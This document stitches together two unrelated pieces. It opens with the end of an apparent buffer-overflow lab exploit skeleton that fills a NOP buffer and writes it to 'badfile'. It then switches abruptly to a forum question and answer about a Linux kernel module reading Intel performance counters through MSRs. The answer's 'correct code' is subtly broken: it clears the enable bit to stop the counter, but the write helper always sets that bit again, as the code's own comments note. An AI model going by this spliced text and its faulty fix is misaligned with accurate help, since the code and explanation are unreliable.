    /* Initialize buffer with 0x90 (NOP instruction) */
    memset(buffer, 0x90, sizeof buffer);

    /* You need to fill the buffer with appropriate contents here */

    /* Save the contents to the file "badfile" */
    badfile = fopen("./badfile", "w");
    if (badfile == NULL) {
        perror("fopen ./badfile");
        return EXIT_FAILURE;
    }
    if (fwrite(buffer, sizeof buffer, 1, badfile) != 1) {
        perror("fwrite ./badfile");
        fclose(badfile);
        return EXIT_FAILURE;
    }
    /* fclose() flushes buffered data, so a failure here means a short file. */
    if (fclose(badfile) != 0) {
        perror("fclose ./badfile");
        return EXIT_FAILURE;
    }
    return EXIT_SUCCESS;
}

Linux module: performance counter does not work

I want to monitor the cache request number in the last level cache. I wrote a Linux module to get that information based on the tutorial here.
It compiles and runs, but the output is always 0. In other words, when I use rdmsr, it always gives me edx=0, eax=0. I even tried the demo code in the tutorial; the output is still 0.
I'm stuck at this problem for a whole week. Could anyone help me point out the mistake I made in the program?
I knew there are some existing programs doing the same thing, but I have to know how to write the code by myself, because I want to monitor the cache request in Xen hypervisor. I cannot use those tools in Xen unless I incorporate the tools into Xen's hypervisor, which seems more work.
/*
* Record the cache miss rate of Intel Sandybridge cpu
* To confirm the event is correctly set!
*/
#include <linux/module.h> /* Needed by all modules */
#include <linux/kernel.h> /* Needed for KERN_INFO */
/*4 Performance Counters Selector for %ecx in insn wrmsr*/
#define PERFEVTSEL0 0x186
#define PERFEVTSEL1 0x187
#define PERFEVTSEL2 0x188
#define PERFEVTSEL3 0x189
/*4 MSR Performance Counter for the above selector*/
/* MSR addresses of the general-purpose counters IA32_PMC0..IA32_PMC3.
 * They are consecutive, one per PERFEVTSELn selector; PMC2 previously
 * duplicated PMC1's address and PMC3 was off by one. */
#define PMC0 0xc1
#define PMC1 0xc2
#define PMC2 0xc3
#define PMC3 0xc4
/*Intel Software Developer Manual Page 2549*/ /*L1I L1D cache events has not been confirmed!*/
/*L1 Instruction Cache Performance Tuning Events*/
#define L1I_ALLHIT_EVENT 0x80
#define L1I_ALLHIT_MASK 0x01
#define L1I_ALLMISS_EVENT 0x80 /*confirmed*/
#define L1I_ALLMISS_MASK 0x02 /*confirmed*/
/*L1 Data Cache Performance Tuning Events*/
/*Intel does not have the ALLREQ Miss mask; have to add LD_miss and ST_miss*/
#define L1D_ALLREQ_EVENT 0x43
#define L1D_ALLREQ_MASK 0x01
#define L1D_LDMISS_EVENT 0x40
#define L1D_LDMISS_MASK 0x01
#define L1D_STMISS_EVENT 0x28
#define L1D_STMISS_MASK 0x01
/*L2 private cache for each core*/ /*confirmed*/
#define L2_ALLREQ_EVENT 0x24
#define L2_ALLREQ_MASK L2_ALLCODEREQ_MASK /*0xFF*/
#define L2_ALLMISS_EVENT 0x24
#define L2_ALLMISS_MASK L2_ALLCODEMISS_MASK /*0xAA*/
#define L2_ALLCODEREQ_MASK 0x30
#define L2_ALLCODEMISS_MASK 0x20
/*L3 shared cache*/ /*confirmed*/
/*Use the last level cache event and mask*/
#define L3_ALLREQ_EVENT 0x2E
#define L3_ALLREQ_MASK 0x4F
#define L3_ALLMISS_EVENT 0x2E
#define L3_ALLMISS_MASK 0x41
/* Bit 16 (USR) and bit 17 (OS) of an event-select value. */
#define USR_BIT (0x01UL << 16)
#define OS_BIT (0x01UL << 17)
/* Set/clear helpers; each modifies the lvalue passed as `reg` in place.
 * Arguments and expansions are parenthesized so that expression arguments
 * keep their intended precedence. */
#define SET_MSR_USR_BIT(reg) ((reg) |= USR_BIT)
#define CLEAR_MSR_USR_BIT(reg) ((reg) &= (~USR_BIT))
#define SET_MSR_OS_BIT(reg) ((reg) |= OS_BIT)
#define CLEAR_MSR_OS_BIT(reg) ((reg) &= (~OS_BIT))
/* ORs the event code into bits 0-7 and the unit mask into bits 8 and up. */
#define SET_EVENT_MASK(reg, event, umask) ((reg) |= ((event) | ((umask) << 8)))
/*MSR EN flag: when set start the counter!*/
//#define MSR_ENFLAG (0x1<<22)
#define MSR_ENFLAG (0x1<<22)
/* 32bit insn v3*/
/*
 * Writes to the MSR whose index is `ecx` in two steps: first a wrmsr with
 * edx:eax = 0, then a wrmsr with edx = 0 and eax = (`eax` | MSR_ENFLAG).
 *
 * NOTE(review): MSR_ENFLAG is OR-ed in unconditionally, so a caller cannot
 * use this function to store a value with that bit cleared.
 * NOTE(review): callers in this file pass an event-select MSR index (e.g.
 * 0x187), so the first write zeroes that selector rather than a counter
 * register, despite the "clear counter" wording below.
 */
static inline void rtxen_write_msr(uint32_t eax, uint32_t ecx)
{
/*clear counter first*/
__asm__ __volatile__ ("movl %0, %%ecx\n\t"
"xorl %%edx, %%edx\n\t"
"xorl %%eax, %%eax\n\t"
"wrmsr\n\t"
: /* no outputs */
: "m" (ecx)
: "eax", "ecx", "edx" /* all clobbered */);
eax |= MSR_ENFLAG;
__asm__("movl %0, %%ecx\n\t" /* ecx contains the number of the MSR to set */
"xorl %%edx, %%edx\n\t"/* edx contains the high bits to set the MSR to */
"movl %1, %%eax\n\t" /* eax contains the low bits to set the MSR to */
"wrmsr\n\t"
: /* no outputs */
: "m" (ecx), "m" (eax)
: "eax", "ecx", "edx" /* clobbered */);
}
/*
 * Executes rdmsr with %ecx loaded from *ecx and stores the resulting
 * %edx into *edx and %eax into *eax. *ecx itself is only read.
 */
static inline void rtxen_read_msr(uint32_t* ecx, uint32_t *eax, uint32_t* edx)
{ __asm__ __volatile__(\
"rdmsr"\
:"=d" (*edx), "=a" (*eax)\
:"c"(*ecx)
);
}
/*
 * Burns a little time by writing 1000 bytes to a local array.
 *
 * The array is volatile so the stores are actually performed; without it
 * the array is never read and an optimizing compiler may remove the whole
 * loop, leaving no memory accesses to measure.
 */
static inline void delay(void )
{
    volatile char tmp[1000];
    int i;

    for( i = 0; i < 1000; i++ )
    {
        tmp[i] = (char)(i * 2);
    }
}
/*
 * Selects which measurement init_module() performs. Only UOPS and L3 have
 * a case in its switch; the other values fall through to its default branch.
 */
enum cache_level
{
UOPS,
L1I,
L1D,
L2,
L3
};
/*
 * Module entry point: programs one event-select MSR through
 * rtxen_write_msr(), reads a counter MSR back through rtxen_read_msr() and
 * logs the values with printk. Which measurement runs is chosen by the
 * local `op`, which is hard-coded to UOPS. Always returns 0.
 */
int init_module(void)
{
enum cache_level op;
uint32_t eax, edx, ecx;
uint64_t l3_all;
op = UOPS;
switch(op)
{
case UOPS:
/* Write the literal selector value to MSR 0x187, then read MSR 0xc2. */
eax = 0x0001010E;
eax |= MSR_ENFLAG;
ecx = 0x187;
printk(KERN_INFO "UOPS Demo: write_msr: eax=%#010x, ecx=%#010x\n", eax, ecx);
rtxen_write_msr(eax, ecx);
ecx = 0xc2;
/* Sentinel values: they are overwritten by the rdmsr results. */
eax = 1;
edx = 2;
rtxen_read_msr(&ecx, &eax, &edx);
printk(KERN_INFO "UOPS Demo: read_msr: edx=%#010x, eax=%#010x\n", edx, eax);
break;
case L3:
/* Build the selector from USR/OS bits, the L3 event/mask and the EN flag. */
eax = 0;
SET_MSR_USR_BIT(eax);
SET_MSR_OS_BIT(eax);
SET_EVENT_MASK(eax, L3_ALLREQ_EVENT, L3_ALLREQ_MASK);
eax |= MSR_ENFLAG;
ecx = PERFEVTSEL2;
printk(KERN_INFO "before wrmsr: eax=%#010x, ecx=%#010x\n", eax, ecx);
rtxen_write_msr(eax, ecx);
printk(KERN_INFO "after wrmsr: eax=%#010x, ecx=%#010x\n", eax, ecx);
printk(KERN_INFO "L3 all request set MSR PMC2\n");
printk(KERN_INFO "delay by access an array\n");
delay();
/* NOTE(review): confirm that the PMC2 macro holds the counter address that pairs with PERFEVTSEL2. */
ecx = PMC2;
eax = 1;
edx = 2;
printk(KERN_INFO "rdmsr: ecx=%#010x\n", ecx);
rtxen_read_msr(&ecx, &eax, &edx); /*need to pass into address!*/
/* Combine the two 32-bit halves into one 64-bit count. */
l3_all = ( ((uint64_t) edx << 32) | eax );
printk(KERN_INFO "rdmsr: L3 all request is %llu (%#010lx)\n", l3_all, (unsigned long)l3_all);
break;
default:
printk(KERN_INFO "operation not implemented yet\n");
}
/*
* A non 0 return means init_module failed; module can't be loaded.
*/
return 0;
}
/* Module exit hook: only logs a farewell message. */
void cleanup_module(void)
{
printk(KERN_INFO "Goodbye world 1.\n");
}
The result I have is:
[ 1780.946584] UOPS Demo: write_msr: eax=0x0001010e, ecx=0x00000187
[ 1780.946590] UOPS Demo: read_msr: edx=0x00000000, eax=0x00000000
[ 1818.595055] Goodbye world 1.
[ 1821.153947] UOPS Demo: write_msr: eax=0x0041010e, ecx=0x00000187
[ 1821.153950] UOPS Demo: read_msr: edx=0x00000000, eax=0x00000000
I finally solved it with the help of @Manuel Selva!
The correct flow for setting up a performance counter is:
Step 1: set the MSR and enable the counter by setting the EN bit in eax;
Step 2: stop the counter by writing to the MSR;
Step 3: read the counter.
I missed step 2; that's why it always gave me 0. It makes sense for it to report 0 if I try to read the counter before stopping it.
The correct code of the switch statement is as follows:
switch(op)
{
case UOPS:
eax = 0x0051010E;
eax |= MSR_ENFLAG;
ecx = 0x187;
printk(KERN_INFO "UOPS Demo: write_msr: eax=%#010x, ecx=%#010x\n", eax, ecx);
rtxen_write_msr(eax, ecx);
//stop counting
eax = 0x0011010E;
rtxen_write_msr(eax,ecx);
ecx = 0xc2;
eax = 1;
edx = 2;
rtxen_read_msr(&ecx, &eax, &edx);
printk(KERN_INFO "UOPS Demo: read_msr: edx=%#010x, eax=%#010x\n", edx, eax);
break;
case L3:
eax = 0;
SET_MSR_USR_BIT(eax);
SET_MSR_OS_BIT(eax);
SET_EVENT_MASK(eax, L3_ALLREQ_EVENT, L3_ALLREQ_MASK);
eax |= MSR_ENFLAG;
eax |= (1<<20); //INT bit: counter overflow
ecx = PERFEVTSEL2;
printk(KERN_INFO "before wrmsr: eax=%#010x, ecx=%#010x\n", eax, ecx);
rtxen_write_msr(eax, ecx);
printk(KERN_INFO "after wrmsr: eax=%#010x, ecx=%#010x\n", eax, ecx);
printk(KERN_INFO "L3 all request set MSR PMC2\n");
printk(KERN_INFO "delay by access an array\n");
delay();
eax &= (~MSR_ENFLAG);
rtxen_write_msr(eax, ecx);
printk(KERN_INFO "stop the counter, eax=%#010x\n", eax);
ecx = PMC2;
eax = 1;
edx = 2;
printk(KERN_INFO "rdmsr: ecx=%#010x\n", ecx);
rtxen_read_msr(&ecx, &eax, &edx); /*need to pass into address!*/
l3_all = ( ((uint64_t) edx << 32) | eax );
printk(KERN_INFO "rdmsr: L3 all request is %llu (%#010lx)\n", l3_all, (unsigned long)l3_all);
break;
default:
printk(KERN_INFO "operation not implemented yet\n");
}

Resources